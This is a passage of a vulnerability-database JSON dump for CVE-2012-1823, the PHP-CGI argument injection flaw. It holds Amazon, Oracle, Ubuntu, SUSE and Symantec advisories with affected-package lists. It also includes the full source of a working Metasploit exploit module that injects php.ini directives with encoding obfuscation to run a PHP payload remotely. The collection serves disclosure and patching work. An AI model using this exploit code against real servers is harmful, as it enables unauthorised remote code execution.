\n php-mbstring-5.3.13-1.20.amzn1.i686 \n php-devel-5.3.13-1.20.amzn1.i686 \n php-xmlrpc-5.3.13-1.20.amzn1.i686 \n php-mssql-5.3.13-1.20.amzn1.i686 \n php-soap-5.3.13-1.20.amzn1.i686 \n php-odbc-5.3.13-1.20.amzn1.i686 \n php-bcmath-5.3.13-1.20.amzn1.i686 \n php-5.3.13-1.20.amzn1.i686 \n php-mcrypt-5.3.13-1.20.amzn1.i686 \n php-tidy-5.3.13-1.20.amzn1.i686 \n php-debuginfo-5.3.13-1.20.amzn1.i686 \n php-ldap-5.3.13-1.20.amzn1.i686 \n php-recode-5.3.13-1.20.amzn1.i686 \n php-fpm-5.3.13-1.20.amzn1.i686 \n php-common-5.3.13-1.20.amzn1.i686 \n php-imap-5.3.13-1.20.amzn1.i686 \n php-embedded-5.3.13-1.20.amzn1.i686 \n php-cli-5.3.13-1.20.amzn1.i686 \n php-pgsql-5.3.13-1.20.amzn1.i686 \n php-intl-5.3.13-1.20.amzn1.i686 \n php-mysqlnd-5.3.13-1.20.amzn1.i686 \n php-pspell-5.3.13-1.20.amzn1.i686 \n php-gd-5.3.13-1.20.amzn1.i686 \n \n src: \n php-5.3.13-1.20.amzn1.src \n \n x86_64: \n php-snmp-5.3.13-1.20.amzn1.x86_64 \n php-mcrypt-5.3.13-1.20.amzn1.x86_64 \n php-5.3.13-1.20.amzn1.x86_64 \n php-devel-5.3.13-1.20.amzn1.x86_64 \n php-dba-5.3.13-1.20.amzn1.x86_64 \n php-mssql-5.3.13-1.20.amzn1.x86_64 \n php-process-5.3.13-1.20.amzn1.x86_64 \n php-imap-5.3.13-1.20.amzn1.x86_64 \n php-pspell-5.3.13-1.20.amzn1.x86_64 \n php-bcmath-5.3.13-1.20.amzn1.x86_64 \n php-common-5.3.13-1.20.amzn1.x86_64 \n php-xml-5.3.13-1.20.amzn1.x86_64 \n php-odbc-5.3.13-1.20.amzn1.x86_64 \n php-debuginfo-5.3.13-1.20.amzn1.x86_64 \n php-xmlrpc-5.3.13-1.20.amzn1.x86_64 \n php-fpm-5.3.13-1.20.amzn1.x86_64 \n php-cli-5.3.13-1.20.amzn1.x86_64 \n php-pgsql-5.3.13-1.20.amzn1.x86_64 \n php-mbstring-5.3.13-1.20.amzn1.x86_64 \n php-ldap-5.3.13-1.20.amzn1.x86_64 \n php-recode-5.3.13-1.20.amzn1.x86_64 \n php-intl-5.3.13-1.20.amzn1.x86_64 \n php-soap-5.3.13-1.20.amzn1.x86_64 \n php-mysqlnd-5.3.13-1.20.amzn1.x86_64 \n php-tidy-5.3.13-1.20.amzn1.x86_64 \n php-mysql-5.3.13-1.20.amzn1.x86_64 \n php-pdo-5.3.13-1.20.amzn1.x86_64 \n php-embedded-5.3.13-1.20.amzn1.x86_64 \n php-gd-5.3.13-1.20.amzn1.x86_64 \n \n \n", "modified": "2014-09-14T16:10:00", "published": "2014-09-14T16:10:00", "id": "ALAS-2012-077", "href": "https://alas.aws.amazon.com/ALAS-2012-77.html", "title": "Critical: php", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2019-05-29T19:48:24", "bulletinFamily": "exploit", "description": "**Name**| php_cgi_remote \n---|--- \n**CVE**| CVE-2012-1823 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| php_cgi_remote \n**Notes**| CVE Name: CVE-2012-1823 \nVENDOR: www.php.net \nNotes: \nAlso see: \nhttp://www.kb.cert.org/vuls/id/520827 \n \n \n \nRepeatability: Infinite \nCVE URL: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823 \nCVSS: 7.5 \n\n", "modified": "2012-05-11T10:15:00", "published": "2012-05-11T10:15:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/php_cgi_remote", "id": "PHP_CGI_REMOTE", "title": "Immunity Canvas: PHP_CGI_REMOTE", "type": "canvas", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-03-24T14:06:33", "bulletinFamily": "exploit", "description": "When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: \"if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the \"encoded in a system-defined manner\" from the RFC) and then passes them to the CGI binary.\" This module can also be used to exploit the plesk 0day disclosed by kingcope and exploited in the wild on June 2013.\n", "modified": "2017-07-24T13:26:21", "published": "2012-05-04T17:17:41", "id": "MSF:EXPLOIT/MULTI/HTTP/PHP_CGI_ARG_INJECTION", "href": "", "type": "metasploit", "title": "PHP CGI Argument Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PHP CGI Argument Injection',\n 'Description' => %q{\n When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to\n an argument injection vulnerability. This module takes advantage of\n the -d flag to set php.ini directives to achieve code execution.\n From the advisory: \"if there is NO unescaped '=' in the query string,\n the string is split on '+' (encoded space) characters, urldecoded,\n passed to a function that escapes shell metacharacters (the \"encoded in\n a system-defined manner\" from the RFC) and then passes them to the CGI\n binary.\" This module can also be used to exploit the plesk 0day disclosed\n by kingcope and exploited in the wild on June 2013.\n },\n 'Author' =>\n [\n 'egypt', 'hdm', #original msf exploit\n 'jjarmoc', #added URI encoding obfuscation\n 'kingcope', #plesk poc\n 'juan vazquez' #add support for plesk exploitation\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'CVE', '2012-1823' ],\n [ 'OSVDB', '81633'],\n [ 'OSVDB', '93979'],\n [ 'EDB', '25986'],\n [ 'URL', 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/' ],\n [ 'URL', 'http://kb.parallels.com/en/116241']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n # Arbitrary big number. The payload gets sent as an HTTP\n # response body, so really it's unlimited\n 'Space' => 262144, # 256k\n },\n 'DisclosureDate' => 'May 03 2012',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [[ 'Automatic', { }]],\n 'DefaultTarget' => 0))\n\n register_options([\n OptString.new('TARGETURI', [false, \"The URI to request (must be a CGI-handled PHP script)\"]),\n OptInt.new('URIENCODING', [true, \"Level of URI URIENCODING and padding (0 for minimum)\",0]),\n OptBool.new('PLESK', [true, \"Exploit Plesk\", false]),\n ])\n end\n\n # php-cgi -h\n # ...\n # -s Display colour syntax highlighted source.\n def check\n\n vprint_status(\"Checking uri #{uri}\")\n\n response = send_request_raw({ 'uri' => uri })\n\n if response and response.code == 200 and response.body =~ /\\<code\\>\\<span style.*\\&lt\\;\\?/mi and not datastore['PLESK']\n vprint_error(\"Server responded in a way that was ambiguous, could not determine whether it was vulnerable\")\n return Exploit::CheckCode::Unknown\n end\n\n response = send_request_raw({ 'uri' => uri + \"?#{create_arg(\"-s\")}\"})\n if response and response.code == 200 and response.body =~ /\\<code\\>\\<span style.*\\&lt\\;\\?/mi\n return Exploit::CheckCode::Vulnerable\n end\n\n if datastore['PLESK'] and response and response.code == 500\n return Exploit::CheckCode::Appears\n end\n\n vprint_error(\"Server responded indicating it was not vulnerable\")\n return Exploit::CheckCode::Safe\n end\n\n def uri\n if datastore['PLESK']\n normalize_uri(\"phppath\", \"php\")\n else\n normalize_uri(target_uri.path).gsub(/\\?.*/, \"\")\n end\n end\n\n def uri_encoding_level\n if datastore['PLESK']\n return 0\n else\n return datastore['URIENCODING']\n end\n end\n\n def exploit\n begin\n args = [\n rand_spaces(),\n create_arg(\"-d\",\"allow_url_include=#{rand_php_ini_true}\"),\n create_arg(\"-d\",\"safe_mode=#{rand_php_ini_false}\"),\n create_arg(\"-d\",\"suhosin.simulation=#{rand_php_ini_true}\"),\n create_arg(\"-d\",'disable_functions=\"\"'),\n create_arg(\"-d\",\"open_basedir=none\"),\n create_arg(\"-d\",\"auto_prepend_file=php://input\"),\n create_arg(\"-d\", \"cgi.force_redirect=#{rand_php_ini_false}\"),\n create_arg(\"-d\", \"cgi.redirect_status_env=0\"),\n rand_opt_equiv(\"-n\")\n ]\n\n qs = args.join()\n\n # Has to be all on one line, so gsub out the comments and the newlines\n payload_oneline = \"<?php \" + payload.encoded.gsub(/\\s*#.*$/, \"\").gsub(\"\\n\", \"\")\n response = send_request_cgi( {\n 'method' => \"POST\",\n 'global' => true,\n 'uri' => \"#{uri}?#{qs}\",\n 'data' => payload_oneline,\n }, 0.5)\n handler\n\n rescue ::Interrupt\n raise $!\n rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused\n print_error(\"The target service unreachable\")\n rescue ::OpenSSL::SSL::SSLError\n print_error(\"The target failed to negotiate SSL, is this really an SSL service?\")\n end\n\n end\n\n def create_arg(arg, val = nil)\n if val\n val = rand_encode(val)\n val.gsub!('=','%3d') # = must always be encoded\n val.gsub!('\"','%22') # \" too\n end\n\n ret = ''\n ret << \"#{rand_spaces}\"\n ret << \"#{rand_opt_equiv(arg)}\"\n ret << \"#{rand_space}\"\n ret << \"#{rand_spaces}\"\n ret << \"#{val}\"\n ret << \"#{rand_space}\"\n end\n\n def rand_opt_equiv(opt)\n # Returns a random equivilant option from mapping at\n # http://www.php.net/manual/en/features.commandline.options.php\n opt_equivs = {\n \"-d\" => [\n \"#{rand_dash}#{rand_encode(\"d\")}\",\n \"#{rand_dash}#{rand_dash}#{rand_encode(\"define\")}\"\n ],\n \"-s\" => [\n \"#{rand_dash}#{rand_encode(\"s\")}\",\n \"#{rand_dash}#{rand_dash}#{rand_encode(\"syntax-highlight\")}\",\n \"#{rand_dash}#{rand_dash}#{rand_encode(\"syntax-highlighting\")}\"\n ],\n \"-T\" => [\n \"#{rand_dash}#{rand_encode(\"T\")}\",\n \"#{rand_dash}#{rand_dash}#{rand_encode(\"timing\")}\"\n ],\n \"-n\" => [\n \"#{rand_dash}#{rand_encode(\"n\")}\",\n \"#{rand_dash}#{rand_dash}#{rand_encode(\"no-php-ini\")}\"\n ]\n }\n\n equivs = opt_equivs[opt]\n equivs ? equivs[rand(opt_equivs[opt].length)] : opt\n\n end\n\n def rand_encode(string, max = string.length)\n # Randomly URI encode characters from string, up to max times.\n chars = [];\n if max > uri_encoding_level then max = uri_encoding_level end\n if string.length == 1\n if rand(2) > 0\n chars << 0\n end\n else\n if max > 0\n max.times { chars << rand(string.length)}\n end\n end\n chars.uniq.sort.reverse.each{|index| string[index] = Rex::Text.uri_encode(string[index,1], \"hex-noslashes\")}\n string\n end\n\n def rand_spaces(num = uri_encoding_level)\n ret = ''\n num.times {\n ret << rand_space\n }\n ret\n end\n\n def rand_space\n uri_encoding_level > 0 ? [\"%20\",\"%09\",\"+\"][rand(3)] : \"+\"\n end\n\n def rand_dash\n uri_encoding_level > 0 ? [\"-\",\"%2d\",\"%2D\"][rand(3)] : \"-\"\n end\n\n def rand_php_ini_false\n Rex::Text.to_rand_case([ \"0\", \"off\", \"false\" ][rand(3)])\n end\n\n def rand_php_ini_true\n Rex::Text.to_rand_case([ \"1\", \"on\", \"true\" ][rand(3)])\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/php_cgi_arg_injection.rb"}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:53", "bulletinFamily": "unix", "description": "[5.3.3-7]\n- correct detection of = in CVE-2012-1823 fix (#818607)\n[5.3.3-6]\n- add security fix for CVE-2012-1823 (#818607)", "modified": "2012-05-07T00:00:00", "published": "2012-05-07T00:00:00", "id": "ELSA-2012-0547", "href": "http://linux.oracle.com/errata/ELSA-2012-0547.html", "title": "php53 security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:29", "bulletinFamily": "unix", "description": "[5.3.3-3.8]\n- correct detection of = in CVE-2012-1823 fix (#818607)\n[5.3.3-3.7]\n- add security fix for CVE-2012-1823 (#818607)", "modified": "2012-05-07T00:00:00", "published": "2012-05-07T00:00:00", "id": "ELSA-2012-0546", "href": "http://linux.oracle.com/errata/ELSA-2012-0546.html", "title": "php security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2018-03-12T02:29:28", "bulletinFamily": "software", "description": "### Description\n\nPHP is prone to an information-disclosure vulnerability. Exploiting this issue allows remote attackers to view the source code of files in the context of the server process. This may allow the attacker to obtain sensitive information and to run arbitrary PHP code on the affected computer; other attacks are also possible.\n\n### Technologies Affected\n\n * Apple Mac OS X 10.6.8 \n * Apple Mac OS X 10.7 \n * Apple Mac OS X 10.7.1 \n * Apple Mac OS X 10.7.2 \n * Apple Mac OS X 10.7.3 \n * Apple Mac OS X 10.7.4 \n * Apple Mac OS X 10.8 \n * Apple Mac OS X 10.8.1 \n * Apple Mac OS X Server 10.6.8 \n * Apple Mac OS X Server 10.7 \n * Apple Mac OS X Server 10.7.1 \n * Apple Mac OS X Server 10.7.2 \n * Apple Mac OS X Server 10.7.3 \n * Apple Mac OS X Server 10.7.5 \n * Avaya Aura Application Enablement Services 5.2 \n * Avaya Aura Application Enablement Services 5.2.1 \n * Avaya Aura Application Enablement Services 5.2.2 \n * Avaya Aura Application Enablement Services 5.2.3 \n * Avaya Aura Application Enablement Services 6.1 \n * Avaya Aura Application Enablement Services 6.1.1 \n * Avaya Aura Communication Manager 6.0 \n * Avaya Aura Communication Manager 6.0.1 \n * Avaya Aura Communication Manager Utility Services 6.0 \n * Avaya Aura Communication Manager Utility Services 6.1 \n * Avaya Aura Communication Manager Utility Services 6.2 \n * Avaya Aura Messaging 6.0 \n * Avaya Aura Messaging 6.0.1 \n * Avaya Aura Messaging 6.1 \n * Avaya Aura Session Manager 5.2 \n * Avaya Aura Session Manager 5.2 SP1 \n * Avaya Aura Session Manager 5.2 SP2 \n * Avaya IP Office Application Server 6.0 \n * Avaya IP Office Application Server 6.1 \n * Avaya IP Office Application Server 7.0 \n * Avaya IP Office Application Server 8.0 \n * Avaya IP Office Application Server 8.1 \n * Avaya Voice Portal 5.0 \n * Avaya Voice Portal 5.0 SP1 \n * Avaya Voice Portal 5.0 SP2 \n * Avaya Voice Portal 5.1 \n * Avaya Voice Portal 5.1 \n * Avaya Voice Portal 5.1 SP1 \n * Avaya Voice Portal 5.1.1 \n * Avaya Voice Portal 5.1.2 \n * Debian Linux 6.0 amd64 \n * Debian Linux 6.0 arm \n * Debian Linux 6.0 ia-32 \n * Debian Linux 6.0 ia-64 \n * Debian Linux 6.0 mips \n * Debian Linux 6.0 powerpc \n * Debian Linux 6.0 s/390 \n * Debian Linux 6.0 sparc \n * Fedoraproject Fedora 15 \n * Fedoraproject Fedora 16 \n * Fedoraproject Fedora 17 \n * Gentoo Linux \n * HP HP-UX B.11.31 \n * HP System Management Homepage 6.0 \n * HP System Management Homepage 6.1 \n * HP System Management Homepage 6.2 \n * HP System Management Homepage 6.3 \n * HP System Management Homepage 7.0 \n * HP System Management Homepage 7.1 \n * HP System Management Homepage 7.1.1 \n * HP System Management Homepage 7.1.2 \n * HP System Management Homepage 7.2.0 \n * IBM Lotus Foundations Start 1.2 \n * IBM Lotus Foundations Start 1.2.2A \n * Juniper CTPView 4.2 \n * Juniper CTPView 4.3 \n * Juniper CTPView 4.4 \n * Juniper CTPView 4.5 \n * Juniper CTPView 4.6 \n * Mandriva Enterprise Server 5 \n * Mandriva Enterprise Server 5 X86 64 \n * Mandriva Linux Mandrake 2010.1 \n * Mandriva Linux Mandrake 2010.1 X86 64 \n * Mandriva Linux Mandrake 2011 \n * Mandriva Linux Mandrake 2011 x86_64 \n * Oracle Enterprise Linux 5 \n * Oracle Enterprise Linux 6 \n * Oracle Enterprise Linux 6.2 \n * PHP PHP 5.3.1 \n * PHP PHP 5.3.10 \n * PHP PHP 5.3.12 \n * PHP PHP 5.3.2 \n * PHP PHP 5.3.3 \n * PHP PHP 5.3.4 \n * PHP PHP 5.3.5 \n * PHP PHP 5.3.6 \n * PHP PHP 5.3.7 \n * PHP PHP 5.3.8 \n * PHP PHP 5.3.9 \n * PHP PHP 5.4.0 \n * PHP PHP 5.4.1 \n * PHP PHP 5.4.2 \n * Parallels Parallels Plesk Panel 8.6 \n * Parallels Parallels Plesk Panel 9.0 \n * Parallels Parallels Plesk Panel 9.2 \n * Parallels Parallels Plesk Panel 9.3 \n * Parallels Parallels Plesk Panel 9.5.4 \n * Redhat Enterprise Linux 5 Server \n * Redhat Enterprise Linux Desktop Optional 6 \n * Redhat Enterprise Linux Desktop Workstation 5 Client \n * Redhat Enterprise Linux EUS 5.6.Z server \n * Redhat Enterprise Linux HPC Node 6 \n * Redhat Enterprise Linux HPC Node Optional 6 \n * Redhat Enterprise Linux Long Life 5.3 server \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server EUS 6.0 \n * Redhat Enterprise Linux Server EUS 6.1.z \n * Redhat Enterprise Linux Server Optional 6 \n * Redhat Enterprise Linux Server Optional EUS 6.0 \n * Redhat Enterprise Linux Server Optional EUS 6.1 \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation Optional 6 \n * SuSE SUSE Linux Enterprise SDK 10 SP4 \n * SuSE SUSE Linux Enterprise SDK 11 SP1 \n * SuSE SUSE Linux Enterprise SDK 11 SP2 \n * SuSE SUSE Linux Enterprise Server 10 SP3 LTSS \n * SuSE SUSE Linux Enterprise Server 10 SP4 \n * SuSE SUSE Linux Enterprise Server 11 SP1 \n * SuSE SUSE Linux Enterprise Server 11 SP2 \n * SuSE SUSE Linux Enterprise Server for VMware 11 SP1 \n * SuSE SUSE Linux Enterprise Server for VMware 11 SP2 \n * SuSE openSUSE 11.4 \n * SuSE openSUSE 12.1 \n * Turbolinux 11 Server \n * Turbolinux 11 Server X64 \n * Turbolinux Appliance Server 3.0 \n * Turbolinux Appliance Server 3.0 X64 \n * Turbolinux Client 2008 \n * Ubuntu Ubuntu Linux 10.04 ARM \n * Ubuntu Ubuntu Linux 10.04 Amd64 \n * Ubuntu Ubuntu Linux 10.04 I386 \n * Ubuntu Ubuntu Linux 10.04 Powerpc \n * Ubuntu Ubuntu Linux 10.04 Sparc \n * Ubuntu Ubuntu Linux 11.04 ARM \n * Ubuntu Ubuntu Linux 11.04 amd64 \n * Ubuntu Ubuntu Linux 11.04 i386 \n * Ubuntu Ubuntu Linux 11.04 powerpc \n * Ubuntu Ubuntu Linux 11.10 amd64 \n * Ubuntu Ubuntu Linux 11.10 i386 \n * Ubuntu Ubuntu Linux 12.04 LTS amd64 \n * Ubuntu Ubuntu Linux 12.04 LTS i386 \n * Ubuntu Ubuntu Linux 8.04 LTS Amd64 \n * Ubuntu Ubuntu Linux 8.04 LTS I386 \n * Ubuntu Ubuntu Linux 8.04 LTS Lpia \n * Ubuntu Ubuntu Linux 8.04 LTS Powerpc \n * Ubuntu Ubuntu Linux 8.04 LTS Sparc \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nExecute all software as a user with minimal privileges. Use additional precautions such as restrictive environments to insulate software that may potentially handle malicious content.\n\nUpdates are available. Please see the references for more information.\n", "modified": "2012-05-04T00:00:00", "published": "2012-05-04T00:00:00", "id": "SMNTC-53388", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53388", "type": "symantec", "title": "PHP 'php-cgi' Information Disclosure Vulnerability", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2019-05-29T17:22:30", "bulletinFamily": "unix", "description": "It was discovered that PHP, when used as a stand alone CGI processor for the Apache Web Server, did not properly parse and filter query strings. This could allow a remote attacker to execute arbitrary code running with the privilege of the web server. Configurations using mod_php5 and FastCGI were not vulnerable.\n\nThis update addresses the issue when the PHP CGI interpreter is configured using mod_cgi and mod_actions as described in /usr/share/doc/php5-cgi/README.Debian.gz; however, if an alternate configuration is used to enable PHP CGI processing, it should be reviewed to ensure that command line arguments cannot be passed to the PHP interpreter. Please see CVE-2012-2311 for more details and potential mitigation approaches.", "modified": "2012-05-04T00:00:00", "published": "2012-05-04T00:00:00", "id": "USN-1437-1", "href": "https://usn.ubuntu.com/1437-1/", "title": "PHP vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:39:50", "bulletinFamily": "unix", "description": "when used in CGI mode remote attackers could inject command\n line arguments to php\n\n", "modified": "2012-05-07T16:08:55", "published": "2012-05-07T16:08:55", "id": "OPENSUSE-SU-2012:0590-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00002.html", "title": "update for php5 (critical)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}